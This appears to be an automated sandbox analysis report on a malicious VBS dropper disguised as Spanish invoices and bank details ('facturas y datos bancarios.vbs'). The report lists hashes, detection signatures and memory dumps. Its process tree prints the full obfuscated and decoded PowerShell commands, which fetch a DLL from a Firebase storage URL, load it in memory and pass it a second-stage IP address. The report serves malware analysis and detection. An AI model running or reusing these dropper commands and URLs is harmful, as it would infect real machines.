Analysis

  • max time kernel
    3s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    13/01/2024, 05:37

General

  • Target

    facturas y datos bancarios.vbs

  • Size

    4KB

  • MD5

    459d63c87281a7c35bd3fb015d41c155

  • SHA1

    14d20f30b220aa969573953606ddcd3392d3bfe2

  • SHA256

    0215fb5ca62cce5debc7bb6720ef089b075aa4167632ae21f9a1df42636b880c

  • SHA512

    ed0e3cb0430a7b2538da3aaa77cfbeeb17d32f5cf625c6eb33177409dd7754ae79ebf955ecdea23bc8ab3e4493dce5bdf7abbcd1bb69c723c93a1d63b3c2a1c7

  • SSDEEP

    96:SDv8vBDqazRdWDkXrV+DVfFf8f7RIT9r17T9rN9rz9rdf9rB:0uxda5tUD+T9x7T9R9f95f9l

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://firebasestorage.googleapis.com/v0/b/truk-droid.appspot.com/o/Droid%2BTurk.txt?alt=media&token=9399305d-e471-4325-b9cf-905c0718f95e

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\facturas y datos bancarios.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AdAByAHUAawAtAGQAcgBvAGkAZAAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBEAHIAbwBpAGQAJQAyAEIAVAB1AHIAawAuAHQAeAB0AD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQA5ADMAOQA5ADMAMAA1AGQALQBlADQANwAxAC0ANAAzADIANQAtAGIAOQBjAGYALQA5ADAANQBjADAANwAxADgAZgA5ADUAZQAnACkAKQA7AFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAGUAKAAnAEYAaQBiAGUAcgAuAEgAbwBtAGUAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4ANAA2AGUAcwBhAGIAeQByAGUAdgBvAGMAZQByAHQAYwBhAHQAbgBvAGMAbgBpAGcAaQByAG8AZABpAG8AcgBkAC8AMgA5AC4AMAA3ADEALgAyADYALgA1ADQALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
      2⤵
        PID:2596
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/truk-droid.appspot.com/o/Droid%2BTurk.txt?alt=media&token=9399305d-e471-4325-b9cf-905c0718f95e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.46esabyrevocertcatnocnigirodiord/29.071.26.54//:ptth'))"
          3⤵
            PID:2124

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/2124-32-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

              Filesize

              9.6MB

            • memory/2124-33-0x00000000029B0000-0x0000000002A30000-memory.dmp

              Filesize

              512KB

            • memory/2124-34-0x00000000029B0000-0x0000000002A30000-memory.dmp

              Filesize

              512KB

            • memory/2124-35-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

              Filesize

              9.6MB

            • memory/2124-30-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

              Filesize

              9.6MB

            • memory/2124-31-0x00000000029B0000-0x0000000002A30000-memory.dmp

              Filesize

              512KB

            • memory/2596-22-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

              Filesize

              9.6MB

            • memory/2596-24-0x0000000002B60000-0x0000000002BE0000-memory.dmp

              Filesize

              512KB

            • memory/2596-20-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

              Filesize

              9.6MB

            • memory/2596-18-0x000000001B630000-0x000000001B912000-memory.dmp

              Filesize

              2.9MB

            • memory/2596-23-0x0000000002B60000-0x0000000002BE0000-memory.dmp

              Filesize

              512KB

            • memory/2596-19-0x0000000001E70000-0x0000000001E78000-memory.dmp

              Filesize

              32KB

            • memory/2596-21-0x0000000002B60000-0x0000000002BE0000-memory.dmp

              Filesize

              512KB

            • memory/2596-36-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

              Filesize

              9.6MB